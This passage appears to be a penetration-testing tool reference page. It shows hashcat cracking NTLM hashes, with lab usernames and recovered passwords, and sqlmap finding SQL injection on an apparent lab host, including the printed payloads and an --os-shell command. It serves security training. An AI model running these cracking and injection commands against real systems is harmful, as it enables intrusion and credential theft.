  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict
  Association      | $1$   | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule
 
If you still have no idea what just happened, try the following pages:
 
* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/
 
If you think you need help by a real human come to the hashcat Discord:
 
* https://discord.gg/HFS523HGBT

Examples

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt

This will run hashcat with a workload profile of 3 (second highest) with an attack mode of 0 (as is) against the specified hash file using the provided dictionary.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
 
31d6cfe0d16ae931b73c59d7e0c089c0:                        
5bd9b7b6fce76d3aabfebee9debaa932:Warrior07               
87e968ead530264915a4b295c57c37d5:Tibbetts3               
5deaec4b57b859c25cdd0513fb7bc750:Patrique2238            
d8d9eee954da5f2d42fe72f862fa493f:Packardbell350          
9b5684b030226a1203e4e7b718a3f9df:Oozle11                 
23d26a03aa7102abce4805d88e568a78:KAMTPS20!!tim           
fe1f27a2561b61511588b0d24e333a7c:Chirmol01               
7a1f1fd59eb2b97041c74748ea6a68f8:BHLMSTz2                
bf459116e5854e34031997be8e13596d:Angels100%              
ca3f0e9ce3188b0602742da2976d6773:2soWht!a                
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:07:12 2022 (11 secs)
Time.Estimated...: Thu Mar 17 02:07:23 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1243.6 kH/s (0.03ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 11/36 (30.56%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Thu Mar 17 02:07:00 2022
Stopped: Thu Mar 17 02:07:24 2022
hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule

This is similar to the above command except it uses the permutation rule best64.rule to check permutations of the provided word list.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 11 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1104517568
 
5ae44bf0a1e24c0b1ec96708f30e7b84:Smitten77               
92929561b2758f409df2b4a24a59c6f4:Alphabet23              
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
 
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:14:29 2022 (2 mins, 14 secs)
Time.Estimated...: Thu Mar 17 02:16:43 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Mod........: Rules (/usr/local/share/doc/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  8011.9 kH/s (1.14ms) @ Accel:256 Loops:77 Thr:1 Vec:8
Recovered........: 13/36 (36.11%) Digests
Progress.........: 1104517568/1104517568 (100.00%)
Rejected.........: 0/1104517568 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-77 Iteration:0-77
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[04a156616d6f]
 
Started: Thu Mar 17 02:14:28 2022
Stopped: Thu Mar 17 02:16:45 2022
hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d

This is similar to the above commands except it uses attack mode 6 which is masking, and instead of specifying predefined permutation rules, it uses a custom mask at the end of the command.

sec@slingshot:~$ hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 13 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1434438400
 
7ce56170c73f9582fa348db88de2c192:Gathering81             
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:20:46 2022 (1 min, 9 secs)
Time.Estimated...: Thu Mar 17 02:21:55 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt), Left Side
Guess.Mod........: Mask (?d?d) [2], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.#2.........: 20964.9 kH/s (0.55ms) @ Accel:256 Loops:100 Thr:1 Vec:8
Recovered........: 14/36 (38.89%) Digests
Progress.........: 1434438400/1434438400 (100.00%)
Rejected.........: 0/1434438400 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-100 Iteration:0-100
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f3132333132] -> $HEX[042a0337c2a156616d6f7321033638]
 
Started: Thu Mar 17 02:20:34 2022
Stopped: Thu Mar 17 02:21:55 2022
hashcat -m 1000 –username –show –outfile-format 2 labs/web01.hashes

This command will show all the NT hashes that we’ve cracked so far for the provided hash file.

sec@slingshot:~$ hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes
Guest:
DefaultAccount:
slopez:Tibbetts3
aparker:Oozle11
rgray:KAMTPS20!!tim
wrobinson:Patrique2238
mlara:Packardbell350
lstout:2soWht!a
tandersen:Angels100%
awalker:Chirmol01
mmiller:BHLMSTz2
vcollins:Warrior07
hhopkins:Alphabet23
kcooper:Smitten77
rduarte:Gathering81
hashcat -m 13100 -a 6 /tmp/tickets /opt/passwords/passwords.txt ?d?d?d?d

This will attempt to crack a kerberos service ticket hash using the password list and appending 4 digits to the end.

Blog Posts

sqlmap

Description

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

PlatformAll
AuthorSqlmap Project
LicenseGPLv3
URLhttps://sqlmap.org

Usage

        ___
       __H__                                                                                                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . ["]     | .'| . |                                                                                                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
Usage: python3 sqlmap [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    -A AGENT, --user..  HTTP User-Agent header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --live-cookies=L..  Live cookies file used for loading up-to-date values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --mobile            Imitate smartphone through HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, Bearer, ...)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --proxy-freq=PRO..  Requests between change of proxy from a given list
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --retry-on=RETRYON  Retry request on regexp matching content (e.g. "drop")
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Regular requests between visits to a safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --csrf-method=CS..  HTTP method to use during anti-CSRF token page visit
    --csrf-retries=C..  Retries for anti-CSRF token retrieval (default 0)
    --force-ssl         Force usage of SSL/HTTPS
    --chunked           Use HTTP chunked transfer encoded (POST) requests
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
 
  Optimization:
    These options can be used to optimize the performance of sqlmap
 
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
 
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    --statements        Retrieve SQL statements being run on DBMS
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=SQLQ..  SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
 
  Brute force:
    These options can be used to run brute force checks
 
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
    --common-files      Check existence of common files
 
  User-defined function injection:
    These options can be used to create custom user-defined functions
 
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
 
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
 
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
 
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
 
  General:
    These options can be used to set some general working parameters
 
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --base64=BASE64P..  Parameter(s) containing Base64 encoded data
    --base64-safe       Use URL and filename safe Base64 alphabet (RFC 4648)
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing (request)
    --postprocess=PO..  Use given script(s) for postprocessing (response)
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp for filtering targets
    --skip-heuristics   Skip heuristic detection of vulnerabilities
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --table-prefix=T..  Prefix used for temporary tables (default: "sqlmap")
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
 
  Miscellaneous:
    These options do not fit into any other category
 
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --beep              Beep on question and/or when vulnerability is found
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --list-tampers      Display list of available tamper scripts
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --results-file=R..  Location of CSV results file in multiple targets mode
    --shell             Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --unstable          Adjust options for unstable connections
    --update            Update sqlmap
    --wizard            Simple wizard interface for beginner users

Examples

sqlmap -u http://x.x.x.x/dashboard.php –forms –crawl=2 –cookie=”PHPSESSID=ecl57pepe51nq8t020n19eajdc”

This command will use a previously obtained authentication cookie to crawl the provided page and test it for sql injection vulnerabilities.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___["]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                                                                                                 
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 21:56:42 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[21:56:44] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[21:56:44] [INFO] searching for links with depth 1
[21:56:45] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[21:56:47] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[21:56:51] [INFO] found a total of 2 targets
[1/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[21:57:03] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_0957pm.csv' as the CSV results file in multiple targets mode
[21:57:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:04] [INFO] testing if the target URL content is stable
[21:57:04] [INFO] target URL content is stable
[21:57:04] [INFO] testing if GET parameter 'search' is dynamic
[21:57:04] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:57:04] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[21:57:04] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[21:57:04] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:57:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:34] [INFO] testing 'Generic inline queries'
[21:57:34] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[21:57:34] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[21:57:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:34] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[21:57:34] [INFO] testing 'PostgreSQL inline queries'
[21:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                                                                                  
[21:57:44] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[21:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:54] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[21:57:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
sqlmap -u http://x.x.x.x/dashboard.php –forms –crawl=2 –cookie=”PHPSESSID=ecl57pepe51nq8t020n19eajdc” –os-shell

This will attempt to exploit a previously found sql injection vulnerability and return an OS shell.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___[,]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [(]     | .'| . |                                                                                                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 22:04:24 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[22:04:26] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[22:04:26] [INFO] searching for links with depth 1
[22:04:27] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[22:04:29] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[22:04:35] [INFO] found a total of 2 targets
[1/2] Form:
POST http://10.129.95.174
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
POST data: username=&password=
do you want to test this form? [Y/n/q]
> n
[2/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[22:05:11] [INFO] resuming back-end DBMS 'postgresql'
